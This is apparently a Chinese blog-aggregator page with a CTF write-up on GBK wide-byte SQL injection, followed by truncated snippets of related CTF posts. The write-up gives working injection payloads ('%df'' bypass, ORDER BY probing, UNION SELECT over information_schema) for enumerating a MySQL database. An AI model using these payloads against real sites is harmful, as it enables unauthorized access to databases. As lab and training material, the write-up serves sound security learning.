南郵ctf mysql 南郵CTF SQL注入題

2021-10-19 05:56:28 字數 820 閱讀 6748

南郵ctf--sql注入題

題目:gbk sql injection

解析:1.判斷注入點:加入單引號發現被反斜槓轉移掉了,換乙個,看清題目,gbk,接下來利用寬位元組進行注入

2.使用'%df' '進行注入,emm報錯,於是加入老手段,and 1=1 %23,ok,沒報錯,說明成功

3.繼續改引數,1=2時,沒有任何資訊,找到注入點

4.利用order by 查詢列數,當查詢2時,顯示正常,那麼查詢3時,顯示錯誤,確定為2列。

5.既然查詢到列,使用聯合查詢,union select 1,2 %23,

6.獲取當前資料庫:union select 1,database() %23

7.獲取當前資料庫名: id=1%df' and 1=2 union select 1,group_concat(table_name) from information_schema.tables where table_schema=0x7361652d6368696e616c6f766572 %23

group_concat(table_name) 分組以後,把想要顯示的列通過gruop_concat()函式拼接在一起。

information_schema.tables 切說是資訊資料庫。其中儲存著關於mysql伺服器所維護的所有其他資料庫的資訊。如資料庫名,資料庫的表,表欄的資料型別與訪問許可權等。

8.獲取表名(ctf-4)id=1%df' and 1=2 union select 1,group_concat(column_name) from information_schema.columns where table_name=0x63746634 %23

南郵ctf mysql 南郵CTF SQL注入題

南郵ctf sql注入題 題目 gbk sql injection 解析 1.判斷注入點 加入單引號發現被反斜槓轉移掉了,換乙個,看清題目,gbk,接下來利用寬位元組進行注入 2.使用 df 進行注入,emm報錯,於是加入老手段,and 1 1 23,ok,沒報錯,說明成功 3.繼續改引數,1 2時...

SQL注入1(南郵CTF)

提示看原始碼 secure web login head if post user post pass if query user admin echo query user 看這個 if query user admin echo logged in flag 題目有兩個輸入框,乙個user乙個密...

南郵CTF攻城記(6)

總結參考 q s 首先隨便輸入密碼,並正確輸入驗證碼,進行操作。事實上,我對這個error不感冒,首先直接說賬號為ctfuser,就必定無法直接出結果。位址列的 y3rmdxnlcg 進行base64解密為 ctfuser 則在傳值時將賬號經過base64加密後進行傳遞。根據題目的提示,我們重置的目...